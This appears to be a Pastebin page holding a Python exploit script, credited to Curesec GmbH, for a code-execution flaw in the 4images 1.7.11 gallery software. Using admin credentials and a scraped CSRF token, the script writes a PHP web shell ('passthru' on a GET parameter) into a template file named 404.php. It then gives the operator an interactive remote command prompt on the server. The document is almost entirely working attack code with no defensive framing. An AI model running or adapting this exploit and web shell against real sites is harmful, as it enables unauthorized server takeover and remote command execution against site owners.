Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/local/bin/python
- # Exploit for 4images 1.7.11 Code Execution vulnerability
- # An admin account is required to use this exploit
- # Curesec GmbH
- import sys
- import re
- import argparse
- import requests # requires requests lib
- parser = argparse.ArgumentParser()
- parser.add_argument("url", help="base url to vulnerable site")
- parser.add_argument("username", help="admin username")
- parser.add_argument("password", help="admin password")
- args = parser.parse_args()
- url = args.url
- username = args.username
- password = args.password
- loginPath = "/admin/index.php"
- fileManagerPath = "/admin/templates.php"
- shellFileName = "404.php"
- shellContent = "<?php passthru($_GET['x']); ?>"
- def login(requestSession, url, username, password):
- csrfRequest = requestSession.get(url)
- csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
- csrfToken = csrfTokenRegEx.group(1)
- postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
- loginResult = requestSession.post(url, data = postData).text
- return "loginpassword" not in loginResult
- def upload(requestSession, url, fileName, fileContent):
- csrfRequest = requestSession.get(url)
- csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
- csrfToken = csrfTokenRegEx.group(1)
- postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
- loginResult = requestSession.post(url, data = postData).text
- def runShell(url):
- print("enter command, or enter exit to quit.")
- command = raw_input("$ ")
- while "exit" not in command:
- print(requests.get(url + command).text)
- command = raw_input("$ ")
- requestSession = requests.session()
- if login(requestSession, url + loginPath, username, password):
- print("successful: login")
- else:
- exit("ERROR: Incorrect username or password")
- upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
- runShell(url + "/templates/default/" + shellFileName + "?x=")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement